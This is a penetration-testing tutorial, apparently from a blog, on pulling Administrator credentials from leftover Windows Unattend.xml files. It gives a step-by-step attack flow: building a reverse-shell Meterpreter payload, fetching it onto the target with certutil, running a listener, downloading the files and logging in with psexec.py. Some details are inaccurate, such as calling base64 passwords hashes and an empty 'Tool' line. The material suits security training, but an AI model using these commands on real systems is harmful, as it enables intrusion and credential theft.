Searching For Passwords In Windows Configuration Files

Windows Configuration Files

• Windows can automate a variety of repetitive tasks, such as the mass rollout or installation of Windows on many systems.

• This is typically done through the use of the Unattended Windows Setup utility, which is used to automate the mass installation/deployment of Windows on systems.

• This tool utilizes configuration files that contain specific configurations and user account credentials, specifically the Administrator account’s password.

• If the Unattended Windows Setup configuration files are left on the target system after installation, they can reveal user account credentials that can be used by attackers to authenticate with Windows target legitimately.

Unattended Windows Setup

• The Unattended Windows Setup utility will typically utilize one of the following configuration files that contain user account and system configuration information:

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Autounattend.xml

• As a security precaution, the passwords stored in the Unattended Windows Setup configuration file may be encoded in base64.

Attack Flow for Installing Meterpreter Shell and Extracting Password Hashes

Overview

In this attack scenario, we aim to gain control over a Windows target server by installing a Meterpreter shell and then extracting password hashes from the Autounattend.xml or Unattend.xml files. These files often contain sensitive information, including password hashes, which can be used for further exploitation.

Steps in the Attack Flow

1. Create a Meterpreter Payload

• Objective: Generate a malicious executable that will create a Meterpreter session on the Windows target server.

• Command:

  Copy

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_local_ip> LPORT=<your_local_port> -f exe -o meterpreter_shell.exe

• Explanation: This command creates an exe file named meterpreter_shell.exe that, when executed on the target machine, will open a Meterpreter session back to your local machine.

2. Install the Meterpreter Payload on the Target Machine

• Objective: Deliver and execute the meterpreter_shell.exe payload on the Windows target server.

• Command:

  Copy

  certutil -urlcache -split -f http://<your_local_ip>/meterpreter_shell.exe C:\Users\Public\meterpreter_shell.exe

• Explanation: This command uses certutil to download and save the meterpreter_shell.exe payload from your local machine to the target machine.

• Execute:

  Copy

  C:\Users\Public\meterpreter_shell.exe

• Explanation: Manually execute the downloaded payload to open a Meterpreter session.

Certutil is a versatile Windows command-line tool used for managing and configuring certificates and certification authorities (CAs). It provides advanced capabilities for dumping cached credentials, exporting and importing certificates, and configuring certificate trust stores, making it essential for both system administration and post-exploitation security assessments.

3. Set Up a Listener on Your Local Machine

• Objective: Prepare your local machine to receive a connection from the Meterpreter payload.

• Command:

  Copy

  msfconsole
  use exploit/multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST <your_local_ip>
  set LPORT <your_local_port>
  exploit

• Explanation: This sets up a listener that waits for a connection from the Meterpreter shell.

4. Establish a Meterpreter Session

• Objective: Gain control of the target system through the Meterpreter session.

• Command:

  • Wait for the connection from the Meterpreter payload. Once the connection is established, you will have control over the target machine.

5. Locate Autounattend.xml or Unattend.xml Files

• Objective: Find the files that contain the password hashes.

Approach 1: Search Using Meterpreter

• Command:

  Copy

  search -f autounattend.xml
  search -f unattend.xml

• Explanation: Use the search command in Meterpreter to look for Autounattend.xml or Unattend.xml files on the target system.

Approach 2: Manual Navigation

• Directories to Check:

  • C:\Windows\System32\Sysprep

  • C:\

  • C:\ProgramData\Microsoft\Windows\

• Explanation: Navigate to these directories to manually look for Autounattend.xml or Unattend.xml files.

6. Download the Configuration Files

• Objective: Transfer the Autounattend.xml or Unattend.xml files to your local machine for analysis.

• Command:

  Copy

  download C:\Path\To\Autounattend.xml
  download C:\Path\To\Unattend.xml

• Explanation: Use the download command in Meterpreter to copy the files from the target machine to your local machine.

7. Extract and Use Password Hashes

• Objective: Extract the password hashes from the downloaded files for further exploitation.

• Tool:
• Command:

  Copy

  python psexec.py <target_ip> -u <username> -p <password>

• Explanation: Use the psexec.py script to log into the target system using the extracted credentials.

Hacker's Mantra:Very smart people are often tricked by hackers, by phishing. I don’t exclude myself from that. It’s about being smarter than a hacker. Not about being smart. - Harper Reed